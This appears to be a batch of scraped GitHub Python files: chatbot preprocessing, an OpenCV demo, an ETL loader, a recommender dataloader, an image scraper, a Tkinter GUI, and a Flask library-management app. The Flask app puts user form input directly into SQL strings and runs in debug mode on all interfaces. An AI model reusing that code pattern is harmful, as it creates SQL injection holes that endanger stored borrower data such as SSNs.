in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.num_words\n self.word2count[word] = 1\n self.index2word[self.num_words] = word\n self.num_words += 1\n else:\n self.word2count[word] += 1\n\n # Remove words below a certain count threshold\n def trim(self, min_count):\n if self.trimmed:\n return\n self.trimmed = True\n\n keep_words = []\n\n for k, v in self.word2count.items():\n if v >= min_count:\n keep_words.append(k)\n\n print('keep_words {} / {} = {:.4f}'.format(\n len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)\n ))\n\n # Reinitialize dictionaries\n \n # Default word tokens\n PAD_token = 0 # Used for padding short sentences\n SOS_token = 1 # Start-of-sentence token\n EOS_token = 2 # End-of-sentence token\n \n self.word2index = {}\n self.word2count = {}\n self.index2word = {PAD_token: \"PAD\", SOS_token: \"SOS\", EOS_token: \"EOS\"}\n self.num_words = 3 # Count default tokens\n\n for word in keep_words:\n self.addWord(word) \n \n \n \n# Turn a Unicode string to plain ASCII, thanks to\n# http://stackoverflow.com/a/518232/2809427\n \nclass trim_pair:\n \n def __init__(self, MAX_LENGTH):\n self.MAX_LENGTH = MAX_LENGTH\n \n def unicodeToAscii(self, s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n \n # Lowercase, trim, and remove non-letter characters\n def normalizeString(self, s):\n s = self.unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n s = re.sub(r\"\\s+\", r\" \", s).strip()\n return s\n \n # Read query/response pairs and return a voc object\n def readVocs(self, datafile, corpus_name):\n print(\"Reading lines...\")\n # Read the file and split into lines\n lines = open(datafile, encoding='utf-8').\\\n read().strip().split('\\n')\n # Split every line into pairs and normalize\n pairs = [[self.normalizeString(s) for s in l.split('\\t')] for l in lines]\n voc = Voc(corpus_name)\n return voc, pairs\n \n # Returns True iff both sentences in a pair 'p' are under the MAX_LENGTH threshold\n def filterPair(self, p):\n return len(p[0].split(' ')) <= self.MAX_LENGTH and len(p[1].split(' ')) <= self.MAX_LENGTH\n \n # Filter pairs using filterPair condition\n def filterPairs(self, pairs):\n return [pair for pair in pairs if self.filterPair(pair)]\n \n # Using the functions defined above, return a populated voc object and pairs list\n def loadPrepareData(self, corpus, corpus_name, datafile, save_dir):\n print(\"Start preparing training data ...\")\n voc, pairs = self.readVocs(datafile, corpus_name)\n print(\"Read {!s} sentence pairs\".format(len(pairs)))\n pairs = self.filterPairs(pairs)\n print(\"Trimmed to {!s} sentence pairs\".format(len(pairs)))\n print(\"Counting words...\")\n for pair in pairs:\n voc.addSentence(pair[0])\n voc.addSentence(pair[1])\n print(\"Counted words:\", voc.num_words)\n return voc, pairs\n\n \ndef trimRareWords(voc, pairs, MIN_COUNT):\n # Trim words used under the MIN_COUNT from the voc\n voc.trim(MIN_COUNT)\n # Filter out pairs with trimmed words\n keep_pairs = []\n for pair in pairs:\n input_sentence = pair[0]\n output_sentence = pair[1]\n keep_input = True\n keep_output = True\n # Check input sentence\n for word in input_sentence.split(' '):\n if word not in voc.word2index:\n keep_input = False\n break\n # Check output sentence\n for word in output_sentence.split(' '):\n if word not in voc.word2index:\n keep_output = False\n break\n\n # Only keep pairs that do not contain trimmed word(s) in their input or output sentence\n if keep_input and keep_output:\n keep_pairs.append(pair)\n\n print(\"Trimmed from {} pairs to {}, {:.4f} of total\".format(len(pairs), len(keep_pairs), len(keep_pairs) / len(pairs)))\n return keep_pairs","repo_name":"ZhicongChu369/ChatBot","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22838095718","text":"import cv2\r\n\r\n## read and show an images\r\nimg = cv2.imread('lena.jpg', 0) # used to read images and value -1,0,1 -> color,greyscale, unchanged\r\nprint(img) # print matrix of image\r\ncv2.imshow('image', img) # show image for split of sec.\r\nk = cv2.waitKey(5000) # wait for milisecond before disappering, if value 0 -> we have to close image or press any key\r\n\r\n## saVe on 's' key press and distory window on 'esc' key press\r\nif k == 27 : # 27 is value for esc ky\r\n\tcv2.destroyAllWindows() # used to distroy all window that created, can use distroyWindow() for distroying single window \r\nelif k == ord('s') or k == ord('S'): #ord takes one value and return in ascii value\r\n\t## write an image\r\n\tcv2.imwrite('lena_copy.png', img) # used to write image in any image format\r\n\tcv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n","repo_name":"saurabh-maurya/Computer-Vision-using-OpenCV","sub_path":"1.getting_started_with_images.py","file_name":"1.getting_started_with_images.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38923730883","text":"import random\n\ndef num_in_col(input_col):\n return all(char.isdigit() for char in input_col)\n\ndef roll_d(dice, rolls=1):\n '''Rolls a dice, multiple times if specified, and returns the total.\n\n Args:\n dice (int): The number of faces\n rolls (int): The number of rolls. (default=1)\n \n Returns:\n The total of all of the rolls.\n '''\n total = 0\n for i in range(rolls):\n total += random.randint(1,dice)\n if rolls == 1 and total == dice:\n print(\"You rolled a natural {}!\".format(total))\n return total\n\ndef convert_str_to_pairs(flat_list, key_map_fn, val_map_fn, key_check=None, val_check=None):\n ''' Converts a string into a list of (key, value) pairs.\n\n Args:\n flat_list (str): The string representation of the pairs (\" ...\")\n key_map_fn (func): The function to be mapped to keys\n val_map_fn (func): The function to be mapped to values\n key_check (func): Returns if key is valid type. (default=None)\n val_check (func): Returns if value is valid type. (default=None)\n \n Returns:\n The new list of pairs, or None if error\n '''\n\n flat_list = flat_list.split()\n if len(flat_list) == 0 or len(flat_list) % 2 != 0:\n print(\"ERROR: invalid list length: {}\".format(flat_list))\n return None\n \n keys = flat_list[0::2]\n if key_check and not key_check(keys):\n print(\"Error: Invalid keys: {}\".format(keys))\n return None\n keys = map(key_map_fn, keys)\n \n values = flat_list[1::2]\n if val_check and not val_check(values):\n print(\"Error: Invalid values: {}\".format(values))\n return None\n values = map(val_map_fn, values)\n\n return zip(keys, values)","repo_name":"SheldonSChen/dnd","sub_path":"sharedHelpers.py","file_name":"sharedHelpers.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22644380897","text":"import pandas as pd\nimport traceback\n\ndef ext_calificacion_sc(ses_db_stg):\n try:\n #Diccionario de los valores\n path = \"csvs/calificacion_sc.csv\"\n calificacion_dic = {\n \"id_cal\" : [],\n \"nombre_cal\" : [],\n }\n\n calificacion_csv = pd.read_csv(path)\n\n #Procesar los archivos csv\n\n if not calificacion_csv.empty:\n for id, cal \\\n in zip(calificacion_csv['ID_CAL'],\n calificacion_csv['NOMBRE_CAL']):\n\n calificacion_dic[\"id_cal\"].append(id),\n calificacion_dic[\"nombre_cal\"].append(cal)\n if calificacion_dic[\"id_cal\"]:\n ses_db_stg.connect().execute(\"TRUNCATE TABLE calificacion_sc_ext\")\n df_calificacion_sc_ext = pd.DataFrame(calificacion_dic)\n df_calificacion_sc_ext.to_sql('calificacion_sc_ext',\n ses_db_stg, \n if_exists='append',\n index=False)\n\n except:\n traceback.print_exc()\n finally:\n pass","repo_name":"MiguelBackAtItAgain/PryAnalisisVisualizacionPublic","sub_path":"extract/extract_calificacion_sc.py","file_name":"extract_calificacion_sc.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43980573051","text":"def solution(data):\n result = True\n sum = 0\n\n if '0' not in data:\n print(-1)\n return -1\n\n data = list(data)\n\n data.sort(reverse=True)\n\n data = ''.join(s for s in data)\n data = int(data)\n\n if data % 3 != 0:\n print(-1)\n return -1\n else:\n print(data)\n return data\n\n\nN = input()\nsolution(N)\n","repo_name":"pickac4rd/boj","sub_path":"string/9251.py","file_name":"9251.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12802407953","text":"from datetime import timedelta as td\nfrom datetime import datetime as dt\nfrom flask import *\nimport Connection\nimport Search\n\napp = Flask(__name__,\n static_folder=\"./static\",\n template_folder=\"./templates\")\n\n\n\ndef books_borrowed(cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BOOK_LOANS where Card_id='{0}' and date_in is null\".format(cardid))\n isbns = [x[0] for x in cursor.fetchall()]\n connection.commit()\n connection.close()\n count = len(isbns)\n return isbns\n\n\ndef valid_cardid(cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BORROWER where Card_id='{0}'\".format(cardid))\n ids = cursor.fetchall()\n count = len(ids)\n connection.close()\n return bool(count)\n\n@app.route(\"/updatefines\")\ndef update_fines():\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"DELETE from FINES where Paid=0\")\n cursor.execute(\"select * from BOOK_LOANS;\")\n loans = cursor.fetchall()\n for loan in loans:\n lid, isbn, cid, dateout, datedue, datein = loan\n datedue = dt.strptime(str(datedue), \"%Y%m%d\")\n if datein == None:\n datein = dt.now()\n else:\n datein = dt.strptime(str(datein), '%Y%m%d')\n\n diff = datein - datedue\n diff = diff.days\n\n if diff > 0:\n fine = diff * .25\n query = \"INSERT IGNORE INTO FINES (Loan_id, Fine_amt, Paid) values ('{}','{}','{}')\".format(lid,\n fine,\n '0')\n cursor.execute(query)\n\n connection.commit()\n connection.close()\n return render_template(\"checkout_s.html\",\n msg=\"Updated\")\n\n\ndef checkout_book(isbn, cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n dateout = dt.now()\n datedue = dateout + td(days=14)\n dateout = dateout.strftime(\"%Y%m%d\")\n datedue = datedue.strftime(\"%Y%m%d\")\n cursor.execute(\n \"\"\"INSERT INTO BOOK_LOANS (Isbn, Card_id, Date_out, Due_date) values ('{}','{}','{}','{}')\"\"\".format(isbn,\n cardid,\n dateout,\n datedue))\n connection.commit()\n connection.close()\n\n\n@app.route(\"/\")\ndef main():\n return render_template(\"home.html\")\n\n\n\n@app.route(\"/results\", methods=[\"GET\", \"POST\"])\ndef results():\n form = request.form\n search = form.get('search')\n t = Search.search_books(search=search)\n if t:\n return render_template(\"results.html\",\n books=t)\n else:\n return render_template(\"checkout_s.html\",\n msg=\"No matching results found\")\n\n\n@app.route(\"/checkin\", methods=[\"GET\", \"POST\"])\ndef checkin():\n form = request.form\n isbn = form.get('isbn')\n datein = form.get('datein').replace('-', '')\n\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"update BOOK_LOANS SET Date_in='{0}' where Isbn='{1}' and Date_in is NULL\".format(datein, isbn))\n connection.commit()\n connection.close()\n update_fines()\n return render_template(\"checkout_s.html\",\n msg=\"Checkin successful!\")\n\n\n@app.route(\"/fetchfines\")\ndef fetchfines():\n update_fines()\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\n \"select B.Card_id, sum(F.Fine_amt) from BOOK_LOANS as B join (select Loan_id,Fine_amt from FINES where Paid=0) as F where F.Loan_id=B.Loan_id group by B.Card_id;\")\n fines = [(x, str(y) + \" USD\") for x, y in cursor.fetchall()]\n connection.commit()\n connection.close()\n if (len(fines) == 0):\n return render_template(\"checkout_s.html\",\n msg=\"All dues settled!\")\n else:\n return render_template(\"fines.html\",\n fines=fines)\n\n\n@app.route(\"/payfine\", methods=[\"GET\", \"POST\"])\ndef payfine():\n form = request.form\n cid = form.get('cid')\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select Loan_id from BOOK_LOANS where Card_id='{}' and Date_in is not NULL;\".format(cid))\n loans = [x[0] for x in cursor.fetchall()]\n\n for loan in loans:\n query = \"update FINES set Paid=1 where Loan_id='{}';\".format(loan)\n cursor.execute(query)\n\n cursor.execute(\n \"select b.Loan_id from BOOK_LOANS b join FINES f on b.loan_id = f.loan_id where b.Card_id='{}' and b.Date_in is NULL and f.paid = 0;\".format(\n cid))\n loans = [x[0] for x in cursor.fetchall()]\n connection.commit()\n connection.close()\n if (not len(loans) == 0):\n return render_template(\"checkout_s.html\",\n msg=\"Payment updated only for books returned. The user with cardid \" + cid + \" has fines related to unreturned books.Books should be checked in first, to pay fine.\")\n else:\n return render_template(\"checkout_s.html\",\n msg=\"Payment successful!\")\n\n\n@app.route(\"/checkout\", methods=[\"GET\", \"POST\"])\ndef checkout():\n form = request.form\n isbn = form.get('isbn')\n cardid = form.get('cardid')\n name = form.get('name')\n is_empty, t = Search.search_booksc(isbn=isbn, cardid=cardid, name=name)\n\n if ((not t) or is_empty):\n if is_empty:\n return render_template(\"checkout_f.html\",\n msg=\"No input is entered,enter atleast one search criteria!\")\n else:\n return render_template(\"checkout_s.html\",\n msg=\"No matching results found\")\n\n else:\n return render_template(\"results_checkin.html\",\n books=t)\n\n\n@app.route(\"/checkoutstatus\", methods=[\"GET\", \"POST\"])\ndef checkoutstatus():\n form = request.form\n isbn = form.get('isbn')\n cardid = form.get('cardid')\n if not valid_cardid(cardid):\n msg = \"Invalid card_id - \" + cardid\n return render_template(\"checkout_f.html\",\n msg=msg)\n\n if len(books_borrowed(cardid)) >= 3:\n msg = \"The card holder already checked out his quota of 3 books\"\n return render_template(\"checkout_f.html\",\n msg=msg)\n book =Search.book_details([isbn])[0]\n if book[\"status\"] == \"Checked out\":\n msg = \"This book has already been checked out\"\n return render_template(\"checkout_f.html\",\n msg=msg)\n\n checkout_book(isbn, cardid)\n\n return render_template(\"checkout_s.html\",\n msg=\"Checkout successful!\")\n\n\ndef isnewssn(ssn):\n connection =Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BORROWER where ssn='{0}'\".format(ssn))\n ids = cursor.fetchall()\n count = len(ids)\n connection.close()\n return not bool(count)\n\n\n@app.route(\"/addborrower\", methods=[\"GET\", \"POST\"])\ndef addborrower():\n form = request.form\n name = form.get('name')\n ssn = form.get('ssn')\n phone = form.get('phone')\n street = form.get('street')\n city = form.get('city')\n state = form.get('state')\n address = street + ', ' + city + ', ' + state\n address = address[:65]\n name = name[:48]\n\n if not isnewssn(ssn):\n return render_template(\"checkout_f.html\",\n msg=\"SSN already exists in db\")\n\n if len(phone) != len(\"2147483647\"):\n return render_template(\"checkout_f.html\",\n msg=\"Invalid phone number.\")\n\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\n \"\"\"INSERT INTO BORROWER (Ssn,Bname,Address,Phone) values ('{}','{}','{}','{}')\"\"\".format(ssn, name, address,\n phone))\n connection.commit()\n connection.close()\n return render_template(\"checkout_s.html\",\n msg=\"Add successful!\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', debug=True)","repo_name":"jaggiaman/Library_Management_System","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8659393691","text":"from torch.utils.data import Dataset\nimport torch\nfrom torch.utils.data import Dataset, IterableDataset, DataLoader\nimport scipy.io as sci\nimport scipy as sp\nimport random\nimport numpy as np\nimport math\nimport os\n\nclass RecData(object):\n def __init__(self, dir, file_name):\n file_name = file_name + 'data.mat'\n self.file_name = os.path.join(dir, file_name)\n\n def get_data(self,ratio):\n mat = self.load_file(file_name=self.file_name)\n train_mat, test_mat = self.split_matrix(mat, ratio)\n return train_mat, test_mat\n \n def load_file(self,file_name=''):\n if file_name.endswith('.mat'):\n return sci.loadmat(file_name)['data']\n else:\n raise ValueError('not supported file type')\n\n def split_matrix(self, mat, ratio=0.8):\n mat = mat.tocsr() #按行读取,即每一行为一个用户\n m,n = mat.shape\n train_data_indices = []\n train_indptr = [0] * (m+1)\n test_data_indices = []\n test_indptr = [0] * (m+1)\n for i in range(m):\n row = [(mat.indices[j], mat.data[j]) for j in range(mat.indptr[i], mat.indptr[i+1])]\n train_idx = random.sample(range(len(row)), round(ratio * len(row)))\n train_binary_idx = np.full(len(row), False)\n train_binary_idx[train_idx] = True\n test_idx = (~train_binary_idx).nonzero()[0]\n for idx in train_idx:\n train_data_indices.append(row[idx]) \n train_indptr[i+1] = len(train_data_indices)\n for idx in test_idx:\n test_data_indices.append(row[idx])\n test_indptr[i+1] = len(test_data_indices)\n\n [train_indices, train_data] = zip(*train_data_indices)\n [test_indices, test_data] = zip(*test_data_indices)\n\n train_mat = sp.sparse.csr_matrix((train_data, train_indices, train_indptr), (m,n))\n test_mat = sp.sparse.csr_matrix((test_data, test_indices, test_indptr), (m,n))\n return train_mat, test_mat\n\n\n\nclass UserItemData(Dataset):\n def __init__(self, train_mat, train_flag=True):\n super(UserItemData, self).__init__()\n self.train = train_mat.tocoo()\n \n def __len__(self):\n # return self.train.shape[0]\n return self.train.nnz\n \n def __getitem__(self, idx):\n return self.train.row[idx].astype(np.int), self.train.col[idx].astype(np.int)","repo_name":"HERECJ/AdaSIR","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"12506959726","text":"# !/usr/bin/python3\n# -*- coding:utf-8 -*- \n# author: Ming Luo\n# time: 2020/7/28 10:29\nimport threading\nimport time\nimport queue\n\nfrom lxml import etree\n\nfrom .file_download import DownLoadExecutioner, file_download\n\n\nclass XiaoHua:\n def __init__(self, init_url):\n self.init_url = init_url\n self.download_executioner = DownLoadExecutioner()\n\n def start(self):\n self.download_executioner.start() # 初始的queue没有值为什么直接运行这行,并且程序能执行\n self.download_img(self.init_url)\n\n def download_img(self, url):\n html_text = file_download(url, type_='text') # 下载页面\n html = etree.HTML(html_text)\n img_urls = html.xpath(\"//a[contains(@class,'thumbnail')]/img/@bpic\") # 查找该页面所有的图片链接\n self.download_executioner.put_task(img_urls) # 将查找到的图片链接放入队列queue中\n\n # 获取下一页的链接\n next_page = html.xpath(\"//div[@id='frs_list_pager']/a[contains(@class,'next')]/@href\")\n next_page = \"http:\" + next_page[0] # 得到下一个页面的链接\n self.download_img(next_page) # 循环重复进入下一页操作\n\n\nif __name__ == '__main__':\n x = XiaoHua(\"http://tieba.baidu.com/f?kw=校花&ie=utf-8\")\n x.start()\n\n# 最多存入10个\nq = queue.Queue(maxsize=10)\n\n\ndef producer(name):\n count = 1\n while True:\n # 生产一块骨头\n q.put(\"骨头 %s\" % count)\n print(\"%s生产了骨头%s\" % (name, count))\n count += 1\n time.sleep(0.3)\n\n\ndef consumer(name):\n while True:\n print(\"%s 取到[%s] 并且吃了它\" % (name, q.get()))\n time.sleep(1)\n # 告知这个任务执行完了\n q.task_done()\n\n\n# 生成线程\np = threading.Thread(target=producer, args=(\"德国骨科\",))\nc = threading.Thread(target=consumer, args=(\"陈狗二\",))\nd = threading.Thread(target=consumer, args=(\"吕特黑\",))\n# 执行线程\np.start()\nc.start()\nd.start()\n","repo_name":"ming-log/python_threading","sub_path":"baidu_threading/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34992572954","text":"try:\n import Tkinter\n import ttk\nexcept:\n import tkinter as Tkinter\n\nfrom Tkinter import N, S, W, E\n\n\nclass PinFrame(object):\n def __init__(self, root):\n _frame = ttk.Frame(root, padding=\"3 3 12 12\")\n _frame.columnconfigure(0, weight=1)\n _frame.rowconfigure(0, weight=1)\n self.frame = _frame\n\n\nclass VccGndFrame(PinFrame):\n def __init__(self, root, volage):\n super(VccGndFrame, self).__init__(root)\n label = \"VDD Pin %dV\" % volage\n ttk.Label(self.frame, text=label).grid(column=0, row=0, sticky=W)\n\n\nclass GpioFrame(PinFrame):\n def __init__(self, root):\n super(GpioFrame, self).__init__(root)\n\n _state = Tkinter.StringVar()\n _state.set(\"0\")\n self.state = _state\n\n _mode = Tkinter.StringVar()\n _mode.set(\"OUTPUT\")\n self.mode = _mode\n\n self.box = ttk.Combobox(self.frame, textvariable=self.mode)\n self.box['values'] = ('OUTPUT', 'INPUT')\n self.box.current(0)\n self.box.bind(\"<>\", self._change_mode)\n self.box.grid(column=5, row=0, sticky=E)\n # Implement on subclass\n #self.pin_widget = None\n\n\n def _change_mode(self, *args):\n _mode = self.mode.get()\n if _mode == \"INPUT\":\n self.mode.set(\"INPUT\")\n self.pin_widget.configure(state='normal')\n else:\n self.mode.set(\"OUTPUT\")\n self.state.set(\"1\")\n self.pin_widget.configure(state='disabled')\n\n\nclass DigitalGuiFrame(GpioFrame):\n def __init__(self, root):\n super(DigitalGuiFrame, self).__init__(root)\n ttk.Label(self.frame, text=\"DigitalPin X\").grid(column=0, row=0, sticky=W)\n self.pin_widget = Tkinter.Checkbutton(self.frame,\n variable=self.state)\n self.pin_widget.configure(state='disabled')\n self.pin_widget.grid(column=2, row=0, sticky=\"\")\n ttk.Label(self.frame, textvariable=self.state).grid(column=1, row=0, sticky=W)\n\n\nclass AnalogGuiFrame(GpioFrame):\n def __init__(self, root):\n super(AnalogGuiFrame, self).__init__(root)\n ttk.Label(self.frame, text=\"AnalogPin X\").grid(column=0, row=0, sticky=W)\n self.pin_widget = Tkinter.Scale(self.frame, from_=0, to=100,\n orient=Tkinter.HORIZONTAL)\n self.pin_widget.configure(state='disabled')\n self.pin_widget.grid(column=2, row=0, sticky=(W, E))\n\n\nclass pinGUIm(object):\n\n def __init__(self):\n self.root = Tkinter.Tk()\n self.root.title(\"pingo :: pinGUIm\")\n self.root.geometry(\"390x240\")\n\n vf = VccGndFrame(self.root, 5)\n df = DigitalGuiFrame(self.root)\n af = AnalogGuiFrame(self.root)\n\n df.frame.grid(column=0, row=0, sticky=(N, W, E, S), padx=15, pady=15)\n af.frame.grid(column=0, row=1, sticky=(N, W, E, S), padx=15, pady=0)\n vf.frame.grid(column=0, row=2, sticky=(N, W, E, S), padx=15, pady=15)\n\n\ngui = pinGUIm()\ngui.root.mainloop()\n","repo_name":"pingo-io/experiments","sub_path":"pinGUIm/digital-analog.py","file_name":"digital-analog.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6669926107","text":"import time\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom imblearn.over_sampling import RandomOverSampler\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom collections import Counter\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\n\n\n# additional downloads\n# nltk.download('stopwords')\n# nltk.download('punkt')\n# nltk.download('wordnet')\n# nltk.download('omw-1.4')\n\n\ndef nlp_cleaning(data, output_filename):\n english_stops = set(stopwords.words(\"english\"))\n wl = WordNetLemmatizer()\n new_col_stems = []\n for summary in data[\"summary\"]:\n print(\".\", end=\"\")\n tokens = word_tokenize(summary.lower()) # split into tokens\n letters_only = [token for token in tokens if token.isalpha()] # remove non-alpha\n no_stops = [token for token in letters_only if token not in english_stops] # remove stop words\n stems = [wl.lemmatize(token) for token in no_stops] # remove plural forms\n stems = [wl.lemmatize(token, 'v') for token in stems] # change verbs to base form\n new_col_stems.append(stems)\n data[\"clean\"] = new_col_stems\n data.to_csv(output_filename)\n\n\ndef string_to_list(s):\n s = s[1:len(s) - 1]\n tmp = s.split()\n ans = []\n for label in tmp:\n ans.append(label[1:len(label) - 2])\n return ans\n\n\ndef sum_counter(data):\n genre = set(data[\"genre\"])\n genre_dict = {g: [] for g in genre}\n genre_dict_counter = {}\n for _, row in data.iterrows():\n genre_dict[row[\"genre\"]].append(Counter(string_to_list(row[\"clean\"])))\n for key in genre_dict.keys():\n genre_dict_counter[key] = sum(genre_dict[key], Counter())\n return genre_dict_counter\n\n\ndef graph(data):\n plt.figure(figsize=(10, 10))\n g = sns.countplot(x=\"genre\", data=data)\n plt.xticks(rotation=45)\n fig = g.get_figure()\n fig.savefig(\"figs/distribution.png\")\n plt.show()\n\n\ndef words_dict_by_genre(data):\n dict = sum_counter(data)\n for key in dict.keys():\n print(key + \": \" + str(dict[key].most_common(10)))\n\n\ndef fit_best(X_train, X_test, y_train, y_test, c):\n model = OneVsRestClassifier(LogisticRegression(C=c))\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n ac = accuracy_score(pred, y_test)\n f1 = f1_score(pred, y_test, average=\"macro\")\n ans = [c, ac, f1]\n return ans\n\n\ndef fit(X_train, X_test, y_train, y_test, old_labels, classifier):\n ans = []\n models = [KNeighborsClassifier(), LogisticRegression(), MultinomialNB(), SVC()]\n name = str(classifier).split('.')[-1][:-2]\n graph, axes = plt.subplots(len(models) // 2, 2, figsize=(18, 12))\n graph.suptitle(name, size=24)\n graph.tight_layout(pad=5.0)\n\n for i, model in enumerate(models):\n model = classifier(model)\n start = time.process_time()\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n fin = time.process_time()\n ac = accuracy_score(pred, y_test)\n f1 = f1_score(pred, y_test, average=\"macro\")\n\n ans.append([str(model), ac, f1, (fin - start) * 1000])\n\n cfm = confusion_matrix(y_test, pred)\n\n plt.figure(figsize=(10, 10))\n fig = sns.heatmap(cfm / cfm.sum(axis=1)[:, None] * 100, annot=True, cmap='Greens', vmax=100)\n fig.set_title(str(model) + \"[%]\")\n fig.set_xlabel(\"Predicted\")\n fig.set_ylabel(\"Real\")\n plt.xticks(rotation=45)\n plt.yticks(rotation=45)\n fig.xaxis.set_ticklabels(old_labels)\n fig.yaxis.set_ticklabels(old_labels)\n fig = fig.get_figure()\n fig.savefig(\"figs/\" + str(model) + \".png\")\n fig = sns.heatmap(cfm / cfm.sum(axis=1)[:, None] * 100, ax=axes[i // 2, i % 2], annot=True, cmap='Greens',\n vmax=100)\n fig.tick_params(labelrotation=45)\n fig.xaxis.set_ticklabels(old_labels)\n fig.yaxis.set_ticklabels(old_labels)\n title = str(model).split('=')[1][:-3]\n fig.title.set_text(title)\n\n df = pd.DataFrame(ans, columns=[\"model\", \"accuracy\", \"F1 score\", \"time ms\"])\n graph.savefig(\"figs/\" + name+\".png\")\n return df\n\n\nif __name__ == '__main__':\n # This function was used mostly for tests, therefore it is quite messy.\n # For a proper evaluation I used the version in notebook\n\n # data = pd.read_csv(\"data/data.csv\", index_col=0)\n # print(data.head())\n # print(\"shape of the data frame \", data.shape)\n # print(\"does it contains missing values?\\n\", data.isna().any(), \"\\n_______\")\n # graph(data)\n # nlp_cleaning(data, \"data/out.csv\")\n data = pd.read_csv(\"data/out.csv\")\n # words_dict_by_genre(data)\n # print(data.head())\n encoder = LabelEncoder()\n data[\"genre\"] = encoder.fit_transform(data[\"genre\"])\n old_labels = dict(zip(encoder.classes_, range(len(encoder.classes_))))\n # X_data = TfidfVectorizer(max_df=0.95).fit_transform(data[\"clean\"])\n X_data = CountVectorizer().fit_transform(data[\"clean\"])\n X_resampled, y_resampled = RandomOverSampler(random_state=119).fit_resample(X_data, data[\"genre\"])\n # X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=79)\n # dist = Counter(y_test)\n # genre_distribution = np.array([dist[i] for i in range(len(dist))])\n # print(dist)\n # res = []\n # start = time.process_time()\n # for r in range(3):\n # X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=r*17+13)\n # for c in range(1,11):\n # print(r, \" \", c)\n # res.append(fit_best(X_train, X_test, y_train, y_test, c/10))\n # df = pd.DataFrame(res, columns=[\"reg. param.\", \"accuracy\", \"F1 score\"])\n # # df = df.groupby('reg. param.').mean()\n # fin = time.process_time()\n # print((fin - start))\n X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=79)\n print(\"___\")\n print(fit(X_train, X_test, y_train, y_test,old_labels, OneVsOneClassifier))\n print(\"___\")\n\n #df = fit(X_train, X_test, y_train, y_test, old_labels)\n # print(df)\n","repo_name":"KarolWes/book_genre_pred","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5341364770","text":"\"\"\"\nMaster script.\n\nThis script.\n\"\"\"\nimport sys\nfrom Modules.Qt import QtCore, QtGui, QtWidgets\nfrom General.Maya_Optimizer.UI import BaseInterface, BaseStatus, Base_Details_v004Qt5, InterfaceFunctions\nfrom General.Maya_Optimizer.Core.Steps import Modeling, Animation, Rigging, Shading, VFX, Lighting\n\nmodulos = [BaseInterface,BaseStatus,Base_Details_v004Qt5, InterfaceFunctions, \n Modeling, Animation, Rigging, Shading, VFX, Lighting]\n[reload (xi) for xi in modulos]\n\n\nclass MyApplication(QtWidgets.QMainWindow, BaseInterface.Ui_MainWindow):\n\n def __init__(self, parent=None):\n super(MyApplication, 